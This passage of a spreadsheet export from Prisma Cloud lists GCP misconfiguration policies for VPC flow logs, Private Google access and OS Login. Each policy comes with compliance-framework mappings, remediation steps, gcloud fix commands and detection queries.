CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST v.9.4.2 [Deprecated], CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements, Fedramp (Moderate), NIST 800-53 Rev 5, Copy of CIS Controls v8, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, PCI DSS v4.0, PCI DSS v4.0, CIS Controls v8, FFIEC, CSA CCM v.4.0.1, CIS Controls v8.1, CRI Profile v2.0, PCI DSS v4.0, Risk Management in Technology (RMiT), Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CRI Profile v1.2.1, Sarbanes Oxley Act (SOX), Copy of ACSC Information Security Manual (ISM)-clone, ISO 27001:2013, ISO 27002:2022, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, Rehan, CIS Controls v7.1, ISO/IEC 27002:2013, PCI DSS v4.0, CIS v1.0.0 (GCP), SOC 2, APRA (CPS 234) Information Security, HIPAA, kfirdaus AWS Account-CS, CDC NIST 800-53 Rev4, NIST CSF, NIST 800-53 Rev4, kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, PCI DSS v4.0, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, CRI Profile v1.2.1, CSA CCM v.4.0.6, ISO 27001:2013, kashan ACSC Information Security Manual (ISM), CIS v3.0.0 (GCP) Level 2, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, CIS Controls v7.1, FFIEC, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, NIST 800-53 Rev 5, MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v.4.0.6, CIS Controls v8.1, CSA CCM v4.0.12, CIS v2.0.0 (GCP) Level 2, CSA CCM v.4.0.6, Matt's ATT&amp;ACK, ISO/IEC 27001:2022, DORA, Copy of ACSC Information Security Manual (ISM)-clone, PCI DSS v3.2.1, PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.1.02</t>
        </is>
      </c>
      <c r="B2854" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2854" s="2" t="inlineStr"/>
      <c r="D2854" t="inlineStr"/>
      <c r="E2854" t="inlineStr"/>
      <c r="F2854" t="inlineStr"/>
      <c r="G2854" t="b">
        <v>1</v>
      </c>
      <c r="H28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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2854" t="inlineStr">
        <is>
          <t>gcloud-compute-networks</t>
        </is>
      </c>
      <c r="K2854" t="inlineStr">
        <is>
          <t>GCP VPC Flow logs for the subnet is set to Off</t>
        </is>
      </c>
      <c r="L2854" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2854" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2854" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2854" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2854" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2854" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2854" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2854" t="inlineStr"/>
      <c r="T2854" t="b">
        <v>1</v>
      </c>
      <c r="U2854" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2854" t="inlineStr">
        <is>
          <t>gcloud-compute-networks-subnets-list</t>
        </is>
      </c>
      <c r="W2854" t="inlineStr">
        <is>
          <t>This policy identifies the subnets in VPC Network which have Flow logs disabled. Flow logs enable the capturing of information about the IP traffic going to and from network interfaces in VPC Subnets.  It is recommended to enable the flow logs which can be used for network monitoring, forensics, real-time security analysis.</t>
        </is>
      </c>
      <c r="X2854" t="inlineStr">
        <is>
          <t>1. Login to GCP Portal
2. Goto VPC Network (on Left Panel)
3. Select the reported VPC network and then click on the alerted subnet 
4. On 'Subnet details' page, click on 'EDIT'
5. Set 'Flow Logs' to value 'On'
6. Click on 'SAVE'. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/logging-policies-1/bc-gcp-logging-1
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/logging-policies-1/bc-gcp-logging-1</t>
        </is>
      </c>
      <c r="Y2854" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'compute.subnetworks.update' permission. Successful execution will enable GCP VPC Flow logs for subnets to capture information about the IP traffic going to and from network interfaces in VPC Subnets.",
'impact': 'Enable flow logs for VPC subnets',
'cliScriptTemplate': 'gcloud compute networks subnets update $resourceName --project=$account --region $region --enable-flow-logs'</t>
        </is>
      </c>
      <c r="Z2854" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-compute-networks-subnets-list' AND json.rule = purpose does not contain INTERNAL_HTTPS_LOAD_BALANCER and purpose does not contain REGIONAL_MANAGED_PROXY and (enableFlowLogs is false or enableFlowLogs does not exist)
{"category":"Logging","resourceTypes":["google_compute_subnetwork"]}</t>
        </is>
      </c>
      <c r="AA2854" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2854" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2854" t="inlineStr">
        <is>
          <t>PC-GCP-VPC-198-CKV_GCP_26</t>
        </is>
      </c>
      <c r="AD2854" t="b">
        <v>1</v>
      </c>
      <c r="AE2854" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2854" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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4" t="inlineStr">
        <is>
          <t>3a83223b-821a-494b-8456-6dfc22fc58d9</t>
        </is>
      </c>
      <c r="AI2854" t="inlineStr">
        <is>
          <t>4e0039a6-ead7-4a28-8041-ef4889c312df</t>
        </is>
      </c>
      <c r="AJ2854" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2854" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2855">
      <c r="A2855" t="inlineStr">
        <is>
          <t>CSA CCM v3.0.1, ISO/IEC 27001:2022, CSA CCM v.4.0.1, ISO 27001:2013, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, NIST CSF, RBI Baseline Cyber Security and Resilience Requirements, CIS Controls v8.1, ISO 27002:2022, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, ISO 27002:2022, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, ISO/IEC 27002:2013, ISO 27002:2022, NIST SP 800-172, ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), SOC 2, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CDC NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2024.2, kashan ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, NIST 800-53 Rev 5, NIST 800-53 Rev 5, SOC 2, ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2024.2, Insurance Regulatory And Development Authority Of India, CIS v1.0.0 (GCP), PCI DSS v4.0, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, CIS Controls v8, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, NIST 800-53 Rev4, ISO/IEC 27018:2019, SOC 2, NIST CSF, ISO/IEC 27001:2022, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, CIS Controls v7.1, CSA CCM v3.0.1, NIST CSF, ISO 27002:2022, Copy of CIS Controls v8, SOC 2, PCI DSS v3.2.1, Copy of ACSC Information Security Manual (ISM)-clone, NIST 800-53 Rev4, CSA CCM v3.0.1, ISO/IEC 27002:2013, ISO/IEC 27002:2013, ISO/IEC 27002:2013, ISO/IEC 27002:2013, kfirdaus AWS Account-CS, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, ISO/IEC 27002:2013, Sarbanes Oxley Act (SOX), ISO/IEC 27001:2022, CSA CCM v.4.0.1, CSA CCM v3.0.1, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2855" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2855" s="2" t="inlineStr"/>
      <c r="D2855" t="inlineStr"/>
      <c r="E2855" t="inlineStr"/>
      <c r="F2855" t="inlineStr"/>
      <c r="G2855" t="b">
        <v>1</v>
      </c>
      <c r="H28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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2855" t="inlineStr">
        <is>
          <t>gcloud-compute-networks</t>
        </is>
      </c>
      <c r="K2855" t="inlineStr">
        <is>
          <t>GCP VPC Network subnets have Private Google access disabled</t>
        </is>
      </c>
      <c r="L2855" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2855" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2855" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2855" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2855" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2855" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2855" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S2855" t="inlineStr">
        <is>
          <t>Policy Status Review</t>
        </is>
      </c>
      <c r="T2855" t="b">
        <v>1</v>
      </c>
      <c r="U2855" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2855" t="inlineStr">
        <is>
          <t>gcloud-compute-networks-subnets-list</t>
        </is>
      </c>
      <c r="W2855" t="inlineStr">
        <is>
          <t>This policy identifies GCP VPC Network subnets have disabled Private Google access. Private Google access enables virtual machine instances on a subnet to reach Google APIs and services using an internal IP address rather than an external IP address. Internal (private) IP addresses are internal to Google Cloud Platform and are not routable or reachable over the Internet. You can use Private Google access to allow VMs without Internet access to reach Google APIs, services, and properties that are accessible over HTTP/HTTPS.</t>
        </is>
      </c>
      <c r="X2855" t="inlineStr">
        <is>
          <t>1. Login to GCP Portal
2. Go to VPC network (Left Panel)
3. Select VPC networks
2. Click on the name of a reported subnet, The 'Subnet details' page will be displayed
3. Click on 'EDIT' button
4. Set 'Private Google access' to 'On'
5. Click on Save 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-private-google-access-is-enabled-for-ipv6
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-private-google-access-is-enabled-for-ipv6</t>
        </is>
      </c>
      <c r="Y2855" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'compute.subnetworks.setPrivateIpGoogleAccess',
'compute.subnetworks.setPrivateIpGoogleAccess' and 'compute.subnetworks.update' permissions. Successful execution will enable GCP VPC Network subnets 'Private Google access'.",
'impact': 'Enables private-ip-google-access in GCP VPC Network subnets',
'cliScriptTemplate': 'gcloud compute networks subnets update $resourceName --project=$account --region $region --enable-private-ip-google-access'</t>
        </is>
      </c>
      <c r="Z2855" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-compute-networks-subnets-list' AND json.rule = purpose is not member of (REGIONAL_MANAGED_PROXY, PRIVATE_SERVICE_CONNECT) and (privateIpGoogleAccess does not exist or privateIpGoogleAccess is false)
{"category":"Networking","resourceTypes":["google_compute_subnetwork"]}</t>
        </is>
      </c>
      <c r="AA2855" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2855" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2855" t="inlineStr">
        <is>
          <t>PC-GCP-VPC-153-CKV_GCP_74</t>
        </is>
      </c>
      <c r="AD2855" t="b">
        <v>1</v>
      </c>
      <c r="AE2855" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2855" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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5" t="inlineStr">
        <is>
          <t>ec842076-78f1-4c9c-86dc-e1c0e00f6150</t>
        </is>
      </c>
      <c r="AI2855" t="inlineStr">
        <is>
          <t>899e01c6-9092-44a8-ae43-1f8a891b01b6</t>
        </is>
      </c>
      <c r="AJ2855" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2855" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2856">
      <c r="A2856" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, MITRE ATT&amp;CK v10.0 [Deprecated], Cybersecurity Maturity Model Certification (CMMC) v.1.02, APRA (CPS 234) Information Security, ISO/IEC 27017:2015, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, NIST SP 800-172, ISO/IEC 27002:2013, CIS Controls v7.1, Matt's ATT&amp;ACK, CIS Controls v8.1, CSA CCM v.4.0.1, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, APRA (CPS 234) Information Security, CIS v1.2.0 (GCP), ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, CSA CCM v.4.0.1, ISO/IEC 27017:2015, Microsoft Cloud Security Benchmark v1, Microsoft Cloud Security Benchmark v1, MITRE ATT&amp;CK v6.3 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated], MITRE ATT&amp;CK v12, CIS v1.0.0 (GCP), Secure Controls Framework (SCF) - 2024.2, Rehan, ISO/IEC 27001:2022, MITRE ATT&amp;CK v12, CIS v2.0.0 (GCP) Level 1, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, NIST SP 800-171 Revision 2, CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v8.2 [Deprecated], CIS v1.1.0 (GCP), RBI Baseline Cyber Security and Resilience Requirements, Secure Controls Framework (SCF) - 2022.2.1, DORA, MITRE ATT&amp;CK v12, PCI DSS v3.2.1, Risk Management in Technology (RMiT), CIS v3.0.0 (GCP) Level 1, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v6.3 [Deprecated], MITRE ATT&amp;CK v12, CIS Controls v8, Copy of CIS Controls v8, Copy of CIS Controls v8, CSA CCM v.4.0.1, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v.4.0.1, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Matt's ATT&amp;ACK, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, SOC 2, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, NIST CSF, ISO 27002:2022, ISO 27001:2013, ISO/IEC 27002:2013, CCPA 2018, PIPEDA, CSA CCM v4.0.12, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Brazilian Data Protection Law (LGPD), MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), ISO/IEC 27001:2022, Matt's ATT&amp;ACK, MITRE ATT&amp;CK v6.3 [Deprecated], NIST SP 800-172, CIS v1.3.0 (GCP), Matt's ATT&amp;ACK, CIS Controls v8.1</t>
        </is>
      </c>
      <c r="B2856" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2856" s="2" t="inlineStr"/>
      <c r="D2856" t="inlineStr"/>
      <c r="E2856" t="inlineStr"/>
      <c r="F2856" t="inlineStr"/>
      <c r="G2856" t="b">
        <v>1</v>
      </c>
      <c r="H28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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2856" t="inlineStr">
        <is>
          <t>gcloud-compute</t>
        </is>
      </c>
      <c r="K2856" t="inlineStr">
        <is>
          <t>GCP Projects have OS Login disabled</t>
        </is>
      </c>
      <c r="L2856" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2856" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2856" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2856" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2856" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2856" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R2856" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S2856" t="inlineStr">
        <is>
          <t>Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2856" t="b">
        <v>0</v>
      </c>
      <c r="U2856" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2856" t="inlineStr">
        <is>
          <t>gcloud-compute-project-info</t>
        </is>
      </c>
      <c r="W2856" t="inlineStr">
        <is>
          <t>This policy identifies GCP Projects which have OS Login disabled. Enabling OS Login ensures that SSH keys used to connect to instances are mapped with IAM users. Revoking access to IAM user will revoke all the SSH keys associated with that particular user. It facilitates centralized and automated SSH key pair management which is useful in handling cases like a response to compromised SSH key pairs.</t>
        </is>
      </c>
      <c r="X2856" t="inlineStr">
        <is>
          <t>1. Login to GCP Portal
2. Navigate to service 'Computer Engine' (Left Panel)
3. For setting project-level OS login configuration, go to the 'Metadata' section under 'Settings'(from Left Panel)
4. Click on the 'Edit' button
5. If the metadata for 'enable-oslogin' is not set, click on '+Add item' and add metadata entry key as 'enable-oslogin' and the value as 'TRUE'/'true'
6. Click on 'Save' to apply the changes
7. You need to validate if any overriding instance-level metadata is set,
8. Go to the tab 'VM instances', under section 'Virtual machines', 
9. For every instance, click on 'Edit'
10. Under Custom metadata, remove any entry with key 'enable-oslogin' and the value 'FALSE'/'false'
11. At the bottom of the 'VM instance details' page, click 'Save' to apply your changes to the instance. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-10
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-10</t>
        </is>
      </c>
      <c r="Y2856" t="inlineStr"/>
      <c r="Z2856" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-compute-project-info' AND json.rule = 'commonInstanceMetadata.items[*].key does not contain enable-oslogin or (commonInstanceMetadata.items[?any(key contains enable-oslogin and (value contains false or value contains FALSE))] exists)'
{"category":"Networking","resourceTypes":["google_compute_instance"]}</t>
        </is>
      </c>
      <c r="AA2856" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2856" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2856" t="inlineStr">
        <is>
          <t>PC-GCP-GCE-208-CKV_GCP_34</t>
        </is>
      </c>
      <c r="AD2856" t="b">
        <v>1</v>
      </c>
      <c r="AE2856" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2856" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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6" t="inlineStr">
        <is>
          <t>82dcb04d-0fae-4d38-9692-fc7dabc0e50c</t>
        </is>
      </c>
      <c r="AI2856" t="inlineStr">
        <is>
          <t>84158703-d321-484e-be15-a780c2dfca48</t>
        </is>
      </c>
      <c r="AJ2856" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2856" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2857">
      <c r="A2857" t="inlineStr">
        <is>
          <t>Secure Controls Framework (SCF) - 2022.2.1, Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Microsoft Cloud Security Benchmark v1, New Zealand Information Security Manual (NZISM v3.4), CSA CCM v4.0.12, Sarbanes Oxley Act (SOX), Copy of New Zealand Information Security Manual (NZISM v3.4)</t>
        </is>
      </c>
      <c r="B2857" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2857" s="2" t="inlineStr"/>
      <c r="D2857" t="inlineStr"/>
      <c r="E2857" t="inlineStr"/>
      <c r="F2857" t="inlineStr"/>
      <c r="G2857" t="b">
        <v>0</v>
      </c>
      <c r="H28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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2857" t="inlineStr">
        <is>
          <t>gcloud-compute</t>
        </is>
      </c>
      <c r="K2857" t="inlineStr">
        <is>
          <t>GCP VM instance OS login overrides Project metadata OS login configuration</t>
        </is>
      </c>
      <c r="L2857" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2857" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2857" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2857" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2857" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2857" t="inlineStr">
        <is>
          <t>10</t>
        </is>
      </c>
      <c r="R2857" t="inlineStr">
        <is>
          <t>10.8</t>
        </is>
      </c>
      <c r="S2857" t="inlineStr"/>
      <c r="T2857" t="b">
        <v>1</v>
      </c>
      <c r="U2857" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2857" t="inlineStr">
        <is>
          <t>gcloud-compute-project-info</t>
        </is>
      </c>
      <c r="W2857" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances where OS login configuration is disabled and overriding enabled Project OS login configuration. Enabling OS Login ensures that SSH keys used to connect to instances are mapped with IAM users. Revoking access to IAM user will revoke all the SSH keys associated with that particular user. It facilitates centralized and automated SSH key pair management which is useful in handling cases like a response to compromised SSH key pairs. 
Note: Enabling OS Login on instances disables metadata-based SSH key configurations on those instances. Disabling OS Login restores SSH keys that you have configured in a project or instance metadata.
Reference: https://cloud.google.com/compute/docs/instances/managing-instance-access</t>
        </is>
      </c>
      <c r="X2857" t="inlineStr">
        <is>
          <t>1. Login to GCP Portal
2. Go to Computer Engine (Left Panel)
3. Go to the VM instances
4. Select the alerted VM instance
5. Click on the 'EDIT' button
6. Go to 'Custom metadata'
7. Remove the metadata entry where the key is 'enable-oslogin' and the value is 'FALSE' or 'false' or 0.(For more information on adding boolean values, refer: https://cloud.google.com/compute/docs/metadata/setting-custom-metadata#boolean)
8. Click on 'Save' to apply the changes</t>
        </is>
      </c>
      <c r="Y2857" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'compute.instances.setMetadata' permission. Successful execution will enable OSLogin which facilitates centralized and automated SSH key pair management which is useful in handling cases like a response to compromised SSH key pairs.",
'impact': 'Enables VM instance OSlogin configuration by updating custom metadata of a VM instance',
'cliScriptTemplate': 'gcloud compute instances add-metadata $resourceName --project=$account --zone $gcpZoneId --metadata enable-oslogin=TRUE'</t>
        </is>
      </c>
      <c r="Z2857" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-compute-project-info' AND json.rule = commonInstanceMetadata.items[?any(key contains "enable-oslogin" and (value contains "Yes" or value contains "Y" or value contains "True" or value contains "true" or value contains "TRUE" or value contains "1"))] exists as X; config from cloud.resource where api.name = 'gcloud-compute-instances-list' AND json.rule = (metadata.items[?any(key exists and key contains "enable-oslogin" and (value contains "False" or value contains "N" or value contains "No" or value contains "false" or value contains "FALSE" or value contains "0"))] exists and name does not start with "gke-" and status equals RUNNING) as Y;filter'$.Y.zone contains $.X.name';show Y;</t>
        </is>
      </c>
      <c r="AA2857" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2857" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2857" t="inlineStr">
        <is>
          <t>PC-GCP-GCE-717</t>
        </is>
      </c>
      <c r="AD2857" t="b">
        <v>1</v>
      </c>
      <c r="AE2857" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2857" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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7" t="inlineStr">
        <is>
          <t>952b25ce-add3-4675-9817-535d2e0973d4</t>
        </is>
      </c>
      <c r="AI2857" t="inlineStr">
        <is>
          <t>cd88ba6d-7e25-4865-871f-d77b4ab93855</t>
        </is>
      </c>
      <c r="AJ2857" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2857" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2858">
      <c r="A2858" t="inlineStr">
        <is>
          <t>ISO 27001:2013, HIPAA, Microsoft Cloud Security Benchmark v1, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CIS v1.3.0 (GCP), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CSA CCM v4.0.12, Matt's ATT&amp;ACK, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, NIST SP 800-172, New Zealand Information Security Manual (NZISM v3.4), NIST SP 800-171 Revision 2, MITRE ATT&amp;CK v6.3 [Deprecated], SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CRI Profile v2.0, APRA (CPS 234) Information Security, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, ISO/IEC 27002:2013, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NIST CSF, CIS v1.2.0 (GCP), ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, MITRE ATT&amp;CK v6.3 [Deprecated], ISO/IEC 27002:2013, HITRUST CSF v.11.2.0, RBI Baseline Cyber Security and Resilience Requirements, MITRE ATT&amp;CK v6.3 [Deprecated], Copy of CIS Controls v8, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Copy of New Zealand Information Security Manual (NZISM v3.4), Secure Controls Framework (SCF) - 2024.2, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, CIS v1.1.0 (GCP), MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v12, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CIS v1.0.0 (GCP), PCI DSS v3.2.1, NIST CSF v2.0, MITRE ATT&amp;CK v6.3 [Deprecated], Risk Management in Technology (RMiT), Copy of New Zealand Information Security Manual (NZISM v3.4), Brazilian Data Protection Law (LGPD), kfirdaus AWS Account-CS, MITRE ATT&amp;CK v10.0 [Deprecated], ISO/IEC 27017:2015, Rehan, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CRI Profile v2.0, CSA CCM v.4.0.1, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, ISO 27001:2013, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated], CIS v2.0.0 (GCP) Level 1, APRA (CPS 234) Information Security, Copy of New Zealand Information Security Manual (NZISM v3.4), NIST CSF, NIST SP 800-171 Revision 3, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), New Zealand Information Security Manual (NZISM v3.4), NIST CSF v2.0, HITRUST v.9.4.2 [Deprecated], Risk Management in Technology (RMiT), ISO/IEC 27002:2013, CIS v3.0.0 (GCP) Level 1, CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, kashan ACSC Information Security Manual (ISM), CCPA 2018, PIPEDA, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), CIS Controls v7.1, MITRE ATT&amp;CK v6.3 [Deprecated], Cybersecurity Maturity Model Certification (CMMC) v.1.02, CSA CCM v.4.0.1, NIST SP 800-172</t>
        </is>
      </c>
      <c r="B2858" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2858" s="2" t="inlineStr"/>
      <c r="D2858" t="inlineStr"/>
      <c r="E2858" t="inlineStr"/>
      <c r="F2858" t="inlineStr"/>
      <c r="G2858" t="b">
        <v>1</v>
      </c>
      <c r="H28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58" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2858" t="inlineStr">
        <is>
          <t>gcloud-compute</t>
